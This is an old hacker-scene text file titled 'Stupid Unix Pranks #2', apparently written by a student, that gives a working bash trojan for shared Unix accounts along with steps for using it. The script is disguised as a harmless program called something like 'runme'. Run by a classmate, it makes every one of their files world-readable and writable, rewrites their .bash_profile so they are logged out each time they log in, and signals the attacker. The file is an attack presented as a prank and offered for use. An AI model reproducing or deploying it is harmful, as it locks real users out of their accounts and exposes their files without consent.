Stupid Unix Pranks by The Darkling #2 This is what I call a Joke Trojen. While this method could be used to do some very bad things I don't really condone them. Warning: This could get you kicked out of unix class and if your school is tight as mine maybee given the big boot. Use with caution. The entire Idea behind this is that we need someone dumb enough to run a program you give them. this program will be a trojen horse that will efectivly lock them out and give you RWX on everything they own. My unix may be a bit rusty as I'm writing this up after unix class, but everything should work. First 'know thi victem, sayith the lord' this person has to be someone that has something you want, and will run a program without thinking about it. Once you have chosen your victem, make the following bash script: <--- begin code ---> #!/bin/bash echo you stupid dick chmod a+rwx * echo logout > .bash_profile cd /home/yourusername echo The hit is made sir > YES echo bye logout <--- End code ---> Now make type chmod g=x filename chmod o=x filename chmod a+xw /home/yourusername make sure to have named it someting like runme or some name that some one would think it a little program that is kewl and safe to run. We before denied read or write accsess to it so they can't see its true nature (except root), so they should not fear it. place it in their /home/username/ dir and wait for the file YES to appear in your home dir. be sure to fill in the vars like yourusername and filename (your user name adn whatever you name the file). The effect of the trojen above goes like this : it says to their screen 'you stupid dick' it gives everyone read write and exacute perms to their files (all!) it makes it so their startup files makes them logout (so they can't log back in.. ) it goes to your dir it makes a file called YES with the insides 'The hit is made sir' it tells them 'bye' it logs them out. I personely like it.. its very effective. if you have the right setup perms on yourstuff ( shown above wih the chmod commands) then it all should work. Go have fun in their dir.. then remove the logout from their .bash_profile before they report to the teacher that some one put a trojen in their dir. =) The Darkling Contact: